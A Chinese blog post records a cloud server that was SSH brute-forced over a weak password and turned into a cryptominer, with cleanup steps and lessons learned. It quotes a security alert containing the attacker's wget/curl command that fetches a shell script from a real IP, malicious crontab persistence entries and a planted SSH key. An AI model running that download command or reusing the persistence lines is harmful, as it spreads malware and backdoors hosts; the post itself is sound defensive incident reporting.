记录一次云主机被攻击挂恶意代码挖矿的事件

3 月，跳不动了？>>>

由于ECS使用了有规律的弱密码被SSH暴力破解（非22端口）

阿里云提示被入侵且执行了恶意代码，安全中心可处理。

相关资料： https://bbs.pediy.com/thread-251753.htm

https://zhuanlan.zhihu.com/p/111351235

但至第二天凌晨时，依旧报警。

父进程路径：/usr/bin/perl 父进程命令行：rsync 父进程id：12354 进程id：12355 用户名：root URL链接：http://45.55.129.23/tddwrt7s.sh 进程路径：/usr/bin/bash 命令行参数：sh -c wget -q http://45.55.129.23/tddwrt7s.sh || curl -s -O -f http://45.55.129.23/tddwrt7s.sh 2>&1 3>&1 与该URL有关联的漏洞：None 事件说明：云盾检测到您的服务器正在尝试访问一个可疑恶意下载源，可能是黑客通过指令从远程服务器下载恶意文件，危害服务器安全。如果该指令不是您自己运行，请及时排查入侵原因，例如查看本机的计划任务、发起对外连接的父子进程。 解决方案：请及时排查告警中提示的恶意URL，以及所下载的目录下的恶意文件，并及时清理已运行的恶意进程。如果该指令是您自己主动执行的，您可以在控制台点击标记为误报。   ------------------------------------ 后排查rsync进程目录下有可疑目录，进行了清除。 lrwxrwxrwx 1 root root 0 Mar 19 01:36 cwd -> /dev/shm/.tddddddddd   继续排查了定时计划 [root@izbp168lretu4toy79p12kz ~]# crontab -l
* */2 * * * /root/.bashtemprc/a/upd>/dev/null 2>&1
@reboot /root/.bashtemprc/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.bashtemprc/b/sync>/dev/null 2>&1
@reboot /root/.bashtemprc/b/sync>/dev/null 2>&1
0 0 */3 * * /tmp/.X19-unix/.rsync/c/aptitude>/dev/null 2>&1   依旧存在可疑目录，删除   后续发现在/root/.ssh目录中中被植入了黑客的公钥文件authorized_keys， 可以被免密码登录SSH了。。。 -------------------- 吸取些教训： 1.切不可用有规律的密码 2.定期检查系统定时任务是否有可疑的任务 3.定期检查/root/.ssh是否被替换了可疑的公钥     (window.slotbydup = window.slotbydup || []).push({ id: "u5931046", container: "_eejbtpvkppn", async: true });